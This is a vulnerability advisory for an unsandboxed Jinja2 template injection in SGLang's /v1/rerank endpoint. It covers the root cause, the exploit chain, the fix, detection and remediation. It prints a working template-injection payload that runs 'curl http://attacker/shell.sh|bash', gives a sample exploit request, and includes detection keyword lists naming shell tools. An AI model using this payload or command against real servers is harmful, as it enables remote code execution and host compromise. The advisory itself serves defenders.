CVE-2026-5760: SGLang Rerank Endpoint RCE via Unsandboxed Jinja2
SGLang's /v1/rerank endpoint renders Jinja2 chat templates without sandboxing, allowing RCE via malicious tokenizer.chat_template in a loaded model file. CVSS 9.8.
Imagine you hired a translator who comes with their own instruction manual. If someone sneaks malicious commands into that manual before it reaches you, the translator could do whatever they want on your computer — steal files, install malware, hold your data for ransom. That's essentially what's happening here.
SGLang is a popular tool that helps run AI models on servers. It has a feature called the reranking endpoint that processes requests from users. The problem is in how it loads AI models: it trusts the instruction files that come bundled with them without checking if they've been tampered with.
An attacker can create a fake or modified AI model file and trick a server into loading it. Hidden inside that file is malicious code disguised as template instructions. When the server loads the model, it runs that hidden code with full access to the system. The attacker now controls everything.
This is particularly dangerous for companies running AI services. If you're offering an API to customers, or using an AI model you downloaded from an untrusted source, you're at risk. Small AI startups and research labs are especially vulnerable because they might not have security teams checking every model they use.
What should you do? First, only download AI models from official sources — the creator's website or established repositories. Second, if you run SGLang, update it immediately when patches arrive. Third, don't load random models people send you, just like you wouldn't run random software from strangers. Think of it like verifying food comes from a trusted restaurant before eating it.
Want the full technical analysis? Click "Technical" above.
CVE-2026-5760 is a critical remote code execution vulnerability in SGLang's reranking inference endpoint. When SGLang loads a model whose tokenizer_config.json contains a malicious chat_template value, the template is rendered server-side using a completely unsandboxed jinja2.Environment(). Any attacker who can cause a target SGLang server to load a model they control — via Hugging Face Hub, a shared model store, or a direct model path argument — can achieve full OS-level code execution on the inference host.
This is not a theoretical gadget chain. It mirrors the exact class of template injection exploited in prior ML-serving advisories (Hugging Face Transformers, llama.cpp GGUF metadata). The difference here is that the injection surface is reachable remotely through the HTTP API with no authentication required in default SGLang deployments.
Root cause:sglang/srt/managers/tokenizer_manager.py calls jinja2.Environment().from_string(chat_template) on attacker-controlled template content loaded from a model file, with no SandboxedEnvironment and no AST restriction, allowing full Python execution through Jinja2's {{ ''.__class__.__mro__[1].__subclasses__() }} MRO traversal.
Affected Component
The vulnerable path is confined to the chat template rendering pipeline inside SGLang's tokenizer manager:
The /v1/rerank endpoint triggers tokenizer application to format input documents, which invokes the chat template renderer. The same code path is reachable via /v1/chat/completions, but reranking was identified as the primary attack surface because it processes bulk document lists — maximizing template render calls per request.
Root Cause Analysis
The vulnerable function constructs a Jinja2 Environment with default settings and passes the model-supplied template string directly to from_string():
# sglang/srt/managers/tokenizer_manager.py (vulnerable)
import jinja2
def _get_jinja_template(self, tokenizer):
chat_template = tokenizer.chat_template # loaded from tokenizer_config.json
if chat_template is None:
return None
# BUG: stock jinja2.Environment() — no sandbox, no extension restrictions,
# no undefined policy. Attacker-controlled string rendered with full
# Python object access via MRO traversal.
env = jinja2.Environment()
return env.from_string(chat_template) # <-- unsandboxed render
def apply_chat_template(self, messages, tokenizer):
template = self._get_jinja_template(tokenizer)
# template.render() executes arbitrary Python if chat_template is malicious
return template.render(
messages=messages,
add_generation_prompt=True,
eos_token=tokenizer.eos_token,
bos_token=tokenizer.bos_token,
)
The jinja2.Environment() constructor, when called with no arguments, creates an environment where template expressions have full access to Python's object model. There is no call to jinja2.sandbox.SandboxedEnvironment, no ImmutableSandboxedEnvironment, and no template.module restriction. The template string originates from tokenizer_config.json on disk — a file shipped inside every HuggingFace model repository.
The attacker-controlled tokenizer_config.json payload that triggers execution:
Where <N> is the index of a suitable subclass exposing __globals__ — typically warnings.catch_warnings or subprocess.Popen depending on the Python environment. A more robust payload uses __import__('subprocess').check_output(...) through the builtins dict directly:
# robust execution payload (works across CPython 3.8–3.12)
PAYLOAD = (
"{%- set ns = namespace(f=''.__class__.__mro__[1].__subclasses__()) -%}"
"{%- for c in ns.f -%}"
" {%- if c.__name__ == 'catch_warnings' -%}"
" {%- set x = c.__init__.__globals__ -%}"
" {%- set _ = x['linecache'].__dict__['os'].system('curl http://attacker/shell.sh|bash') -%}"
" {%- endif -%}"
"{%- endfor -%}"
"TEMPLATE_OUTPUT"
)
Exploitation Mechanics
EXPLOIT CHAIN:
1. Attacker publishes malicious model to HuggingFace Hub (or serves via --model-path)
└─ tokenizer_config.json contains weaponized chat_template payload
2. SGLang operator loads model:
$ python -m sglang.launch_server --model attacker/malicious-reranker --port 30000
3. TokenizerManager.from_pretrained() reads tokenizer_config.json
└─ self.tokenizer.chat_template = ""
4. Attacker sends HTTP POST to /v1/rerank:
POST /v1/rerank HTTP/1.1
Host: victim:30000
Content-Type: application/json
{
"model": "attacker/malicious-reranker",
"query": "test",
"documents": ["doc1", "doc2"]
}
5. Server calls apply_chat_template() to format each document
└─ _get_jinja_template() constructs unsandboxed jinja2.Environment()
└─ env.from_string(chat_template) compiles malicious template AST
6. template.render(messages=[...]) executes payload
└─ MRO traversal resolves catch_warnings.__init__.__globals__
└─ os.system() / subprocess called with attacker command
7. OS-level RCE achieved as inference server process user (often root in containers)
└─ GPU host compromised; lateral movement to training infra possible
No authentication bypass is required. Default SGLang server deployments bind on 0.0.0.0:30000 with no API key enforcement. Any network-reachable client can POST to /v1/rerank.
Memory Layout
This is not a memory corruption class vulnerability — the primitive is logic-level template injection. The relevant "memory" is the Python object graph traversed during template.render(). The MRO walk that exposes os:
PYTHON OBJECT GRAPH TRAVERSAL DURING RENDER:
str.__class__ →
.__mro__[1] →
.__subclasses__() → [, , ..., , ...]
^
index varies by Python version/imports
enumerate at exploit time
catch_warnings
.__init__ →
.__globals__ → {'__name__': 'warnings', 'linecache': , ...}
['linecache']
.__dict__['os'] → ← PIVOT POINT
.system(cmd) → executes shell command
JINJA2 ENVIRONMENT STATE (unsandboxed):
env.sandbox = None ← no sandbox installed
env.undefined = Undefined ← default, no restriction
env.keep_trailing_newline = False
env.globals = {'range': ..., 'lipsum': ..., 'dict': ...}
env.filters = { ... all default filters ... }
env.tests = { ... }
← getattr() calls on arbitrary Python objects: UNRESTRICTED
Patch Analysis
The correct fix is to replace jinja2.Environment() with jinja2.sandbox.SandboxedEnvironment(), which wraps attribute access through SandboxedEnvironment.getattr() and blocks MRO traversal, dunder access, and __globals__ exposure. The Hugging Face transformers library patched an identical issue in GHSA-g4xx-wp89-q2jq.
SandboxedEnvironment intercepts all attribute and item access through is_safe_attribute(), which blocks:
# jinja2/sandbox.py — what SandboxedEnvironment blocks:
UNSAFE_GENERATOR_ATTRIBUTES = {'gi_frame', 'gi_code'}
UNSAFE_COROUTINE_ATTRIBUTES = {'cr_frame', 'cr_code'}
UNSAFE_ASYNC_GENERATOR_ATTRIBUTES = {'ag_frame', 'ag_code'}
def is_unsafe_attribute(obj, attr):
# blocks: __class__, __mro__, __subclasses__, __globals__,
# __builtins__, __import__, func_globals
if attr in UNSAFE_GENERATOR_ATTRIBUTES: return True
if attr.startswith('__') and attr.endswith('__'): return True
...
An additional hardening measure — validating chat_template against a restricted AST node allowlist before rendering — should be applied as defense-in-depth, given the history of sandbox escapes in Jinja2 itself.
Detection and Indicators
Detection requires visibility into both the model loading event and the template content:
IOCs / DETECTION POINTS:
1. tokenizer_config.json content:
YARA-style: strings containing .__class__.__mro__ | __subclasses__ | __globals__
│ | __builtins__ | __import__ | linecache | catch_warnings
2. Process execution anomalies:
Parent: python (sglang server PID)
Child: sh -c "..." | curl | wget | bash
← unexpected child process from inference server
3. HTTP access logs:
POST /v1/rerank with 4xx NOT appearing → payload rendered successfully
POST /v1/chat/completions with unusual document-structured messages
4. Filesystem:
/tmp/pwned, /tmp/*.sh created by inference server UID
5. Network:
Outbound connections from GPU host to non-model-registry IPs
originating from the Python inference process
On Kubernetes-deployed SGLang, enable Falco rule: spawned_process where parent comm = python3 and proc.name in (sh, bash, curl, wget).
Remediation
Immediate: Replace all jinja2.Environment() instantiations in the SGLang tokenizer pipeline with jinja2.sandbox.SandboxedEnvironment(). Audit hf_transformers_utils.py and any other path that calls from_string() on model-supplied content.
Short-term:
Validate chat_template against an AST allowlist (permit only For, If, Output, Filter nodes; reject any Getattr chain longer than depth 2).
Run SGLang inference servers as a non-root, no-shell UID with seccomp profiles blocking execve and fork.
Gate model loading behind an operator allowlist — only load models from verified, pinned SHA256 revisions.
Long-term: SGLang should implement a model trust boundary analogous to trust_remote_code=False in HuggingFace Transformers, requiring explicit operator opt-in for any model-provided executable content including chat templates.
The proof-of-concept published by Stuub demonstrates full shell execution against SGLang ≤ 0.5.9. Treat any unpatched SGLang deployment accessible from untrusted networks as fully compromised if it has loaded external models.